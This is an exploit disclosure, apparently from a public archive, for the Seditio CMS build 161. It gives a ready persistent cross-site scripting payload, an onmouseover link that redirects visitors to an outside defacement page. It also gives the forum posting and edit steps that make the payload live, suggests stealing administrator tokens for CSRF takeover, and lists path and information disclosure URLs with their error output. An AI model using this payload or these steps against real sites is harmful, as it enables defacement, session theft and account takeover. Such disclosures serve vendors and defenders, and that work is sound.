==========================================================
Vulnerable Software: seditio-build161
==========================================================
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl

# md5sum sed*.rar
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar

Installation:Standart (i assume with default settings)

Tested:
==========================================================
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
==========================================================
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:
==========================================================
Exploitation:
Create new topic(/forums.php?m=newtopic&s=1)
using the following details:

Topic Title: Whatever you want.
Topic Description: Whatever you want.
Body:
Inject this:
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>

Post the topic.

Then you'll see it as plaintext for first time.
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.
After update you'll return to your post.Try to over your mouse over the link.

Same rules and exploitation also applies to *Reply* section.
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.
@Print screen on success pwn:
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png

Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using
document.body.innerHTML(to steal administrator tokens)
==========================================================
Ok now about Info And Path Disclosure:
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)

http://192.168.0.15/learn/9/seditio/view.php

Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21
@http://www.neocrome.net/view.php

http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php

Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37


http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450


http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php


Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37

Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104
================================================================================
==========================
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21

@http://www.neocrome.net/system/core/view/view.inc.php

================================================================================
=============================
Info disclosure:
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql

http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql
IMO Needs at least simply .htaccess rule to protect from eyes this files.
================================================================================
==============================